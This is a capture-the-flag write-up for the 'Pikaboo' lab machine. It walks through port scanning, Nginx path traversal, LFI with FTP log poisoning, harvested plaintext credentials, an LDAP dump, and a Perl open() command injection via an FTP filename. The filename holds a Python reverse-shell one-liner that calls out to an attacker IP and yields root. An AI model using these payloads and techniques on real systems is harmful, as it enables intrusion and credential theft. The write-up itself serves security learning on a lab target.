nmap -sC -sV -oA pikaboo 10.10.10.249
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 16:58 EET
Nmap scan report for 10.10.10.249
Host is up (0.12s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
| 256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_ 256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelWe got three open ports: 21 => FTP 22 => SSH 80 => HTTP And there is no critical vulnerabilities for these versions. Checked FTP for anonymous login but it's not allowed, so lets start enumerating port 80
![[Pasted image 20210926193047.png]] Going to http://10.10.10.249 we see Pokatdex, Contact and Admin pages. Checking Pokatdex and Contact but both don't have anything useful, and Admin requires credentials to login. ![[Pasted image 20210926193439.png]]
I tried default credentials like admin:admin and doesn't work but after i click cancel i notice something interesting. ![[Pasted image 20210926193755.png]] The page says it's running on Apache/2.4.38 on port 81, but nmap said it's running Nginx on port 80. So maybe Nginx is running as a reverse proxy and forwarding the traffic on /admin to port 81 which is running Apache on it.
I know from a previous machine i solved before that there is a path traversal vulnerability in Nginx and this blog describes it.
https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/
Trying what the blog says, and we get Forbidden. ![[Pasted image 20210926201102.png]]
Now lets run FFUF and fuzz for hidden directory.
ffuf -u http://10.10.10.249/admin../FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -t 100 -e php | tee -a nginx-lfi.ffuf
It found javascript directory but gives Forbidden, and there is server-status so lets check it.
![[Pasted image 20210926201546.png]]
There is admin_staging directory lets check it . ![[Pasted image 20210926202026.png]]
Notice that you have to put "/" at the end of admin_staging or it will redirect you to localhost. ![[Pasted image 20210926203855.png]]
While enumerating the dashboard, found nothing helpful but there is page parameter that i guess is vulnerabile to LFI.
Tried including /etc/passwd but doesn't work, also tried to use php filter wrapper to read the source code of every php file but didn't find anything useful.
After wasting alot of time i remembered something, we have FTP port open and in server-status file there was a request to /admin/../admin_staging/index.php?page=/var/log/vsftpd.log so lets try to read it. ![[Pasted image 20210926233119.png]]
And we are able to read it, so we have LFI. ![[Pasted image 20210926233551.png]]
We can try FTP poisoning to inject PHP code inside FTP logs and then visit it using our LFI to execute code on the system.
First we will connect to FTP and inject simple PHP code to execute id command in the system. ![[Pasted image 20210926234037.png]]
Then we use our LFI vulnerability to read the FTP log file. ![[Pasted image 20210926234119.png]]
Now that we can execute commands on the system lets get a revese shell. First we run a netcat listener and replace id command with a reverse shell. ![[Pasted image 20210926234452.png]]
Then read FTP logs again to execute the PHP code, and we get a shell. ![[Pasted image 20210926234626.png]]
While enumeration, i found htpasswd file inside /etc/apache2/ that contains a password hash. Tried cracking it but failed.
admin:$apr1$0.2FVvEK$Xn42uf/ySS5IPTKXfebXM.
Inside /opt directory there is pokeapi which is was't complete on the site, lets look for hardcoded credentials.
I found credentials inside /config/settings.py.
binduser:J~42%W?PFHl]g ![[Pasted image 20210928154805.png]]
Also found another creds inside /config/settings.py.
ash:pokemon ![[Pasted image 20210928154833.png]]
Also LDAP is running on localhost, so lets try connecting to it to extact everything from the domain. ![[Pasted image 20210928155302.png]]
ldapsearch -x -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g' -b "DC=pikaboo,DC=htb"
![[Pasted image 20210928163318.png]]
We found the password for pwnmeow user encoded in base64.
After decoding it we get:
pwnmeow:G0tT4_C4tcH'3m_4lL!_
I tried the password with ssh and su and didn't work, but worked for ftp. ![[Pasted image 20210928164429.png]]
We can't list any of these directories and nothing to do here, so i returned to the shell and continued enumeration. ![[Pasted image 20210928192510.png]]
Found a cron job that runs this script /usr/local/bin/csvupdate_cron, lets check it. ![[Pasted image 20210928192802.png]]
![[Pasted image 20210928192909.png]] It's passing the name of each directory in /srv/ftp to another script, lets take a look at this script.
![[Pasted image 20210928193836.png]] This perl script is just updating CSV files with ftp uploaded ones. But perl's open function has command injection vulnerability if implemented in a wrong way, check this link.
https://stackoverflow.com/questions/26614348/perl-open-injection-prevention
If the name of the file contains | character then followed by a string, it will treat this string as command and executes it.
Now we need to upload a file inside any directory in the ftp directory with a | followed by a reverse shell, then the cron job will execute the script and then runs our command and gives us a shell.
First, create a file on your machine and name it test and run a netcat listener, then connect to ftp and execute the following:
cd versions
put test "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"10.10.16.32\",1337));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")';.csv"
Wait for a moment, and we are root! ![[Pasted image 20210928201143.png]]